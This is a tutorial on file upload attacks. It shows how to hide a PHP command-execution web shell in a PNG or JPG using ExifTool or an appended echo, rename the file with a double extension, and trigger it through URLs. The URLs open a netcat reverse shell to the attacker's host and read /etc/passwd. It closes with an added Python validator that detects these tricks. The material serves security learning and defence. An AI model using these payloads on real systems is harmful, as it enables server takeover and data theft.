INTRO

A file upload vulnerability is a very serious one for any website: it can give an attacker full shell access to the server. Recently, a person earned a nice amount of money by finding this bug on a website. You can find this kind of vulnerability too if you understand how it works and how it can be exploited.

It is not so easy to exploit, though, because today there are many ways to prevent it, but it is still found quite often on less well-known websites. Some web servers are configured so that uploaded files cannot be executed at all, some rename the uploaded file, and some scan the file while it is being uploaded.

The safest approach is to deny execute permission on uploaded files and to rename every uploaded file. A virus scan, on the other hand, can be bypassed; not easily, but it can be.


ATTACK

First, we will embed some PHP code (which we will later use to launch a reverse shell) in an image. If you have been reading the articles on this website from the start, you already know about ExifTool. It edits image metadata, which lets us write a string of code into an image file (jpg/jpeg/png/gif).

∗To embed the PHP code in an image file, type this command:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' imagefile.jpg

This is not a reverse shell by itself, but we can use it to launch a reverse shell, which I will show you in a minute.

This can also be done manually, and I would recommend the manual method. We create an image of any colour and then append the PHP string to that file. It isn't as hard as it seems. I am recommending this method because recently, while trying to gain a shell on an HTB box, I used ExifTool and it didn't work at all. I don't know why it didn't work.

∗To create a plain single-colour image:

convert -size 32x32 xc:white whatever.png

You can change the resolution, the colour and of course the name of the image file.

Now we will use the echo command to inject PHP code into the image:

echo '<?php echo shell_exec($_GET["cmd"]); ?>' >> whatever.png

Remember to use >> and not >. With a single > the image content would be replaced by the PHP string instead of having the string appended to it.

∗Before uploading it to the web server, we will rename the file:

mv whatever.png whatever.php.png

Now you can upload it on a vulnerable platform like DVWA or bWAPP. Just uploading the file won't do anything, though; you also have to request it so that the server executes it. And remember that it is not a reverse shell by itself, but you can use it to run a reverse shell on the server.

∗If you want to run a reverse shell, the URL would be:

http://<IP>:<PORT>/whatever.php.png?cmd=nc <your-IP> <your listening PORT> -e "/bin/bash"


You can use some other reverse shell if the Netcat one doesn't work. You can check out the list of reverse shells here.

∗But if you just want to read /etc/passwd, the command would be:

http://<IP>:<PORT>/whatever.php.png?cmd=cat /etc/passwd

If the commands you type aren't working, try URL-encoding them; that may help. But it always depends on the server: it may not allow uploaded files to be executed, or it may have renamed our uploaded file to some random name.
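The defences mentioned in the intro (renaming the file, checking what was uploaded) map directly onto the three tricks used above: a PHP tag in the EXIF Comment, a payload appended after the image data with >>, and the whatever.php.png double extension. The following Python is an added example of a server-side upload check that catches each of them; it is not from the original article or from DVWA/bWAPP, and vet_upload, png_trailing_bytes and the constructed 1x1 PNG are illustrative names and inputs.

```python
import os
import secrets
import struct
import zlib

# Magic bytes for the image types the article's upload scenario involves.
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
         b"GIF87a": "gif", b"GIF89a": "gif"}
PHP_MARKERS = (b"<?php", b"<?=")  # cheap byte scan; can false-positive on binary

def png_trailing_bytes(data):
    """Bytes after the IEND chunk (0 for a clean PNG). Anything added with
    `echo ... >> image.png` lands here, after the last chunk."""
    pos = 8  # skip the 8-byte signature
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # length + type + payload + CRC
        if ctype == b"IEND":
            return len(data) - pos
    raise ValueError("truncated PNG: no IEND chunk")

def vet_upload(client_name, data):
    """Return (ok, reason, stored_name). The stored name is a random token plus
    an extension derived from the detected type, never from the client's name."""
    parts = os.path.basename(client_name).lower().split(".")
    # whatever.php.png: reject any inner extension a misconfigured server might run
    if any(p in ("php", "phtml", "phar", "php3", "php5") for p in parts[1:-1]):
        return False, "double extension", None
    kind = next((k for m, k in MAGIC.items() if data.startswith(m)), None)
    if kind is None or parts[-1] not in ("png", "jpg", "jpeg", "gif"):
        return False, "not an allowed image type", None
    if any(m in data for m in PHP_MARKERS):
        # covers both the ExifTool -Comment route and an appended payload
        return False, "php tag in image", None
    if kind == "png" and png_trailing_bytes(data) > 0:
        return False, "data after IEND", None
    return True, "ok", f"{secrets.token_hex(16)}.{kind}"

def make_png():
    """Constructed 1x1 white PNG used as sample input (not from the article)."""
    def chunk(ctype, body):
        crc = struct.pack(">I", zlib.crc32(ctype + body))
        return struct.pack(">I", len(body)) + ctype + body + crc
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\xff\xff")            # filter 0 + one white pixel
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", idat) + chunk(b"IEND", b""))
```

The byte scan is only a cheap first gate; re-encoding the image with an image library and serving uploads from a directory where script execution is disabled (the intro's first recommendation) is what actually makes an embedded payload inert.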


Stay home, stay safe and keep reading our articles.

Thanks For Visiting
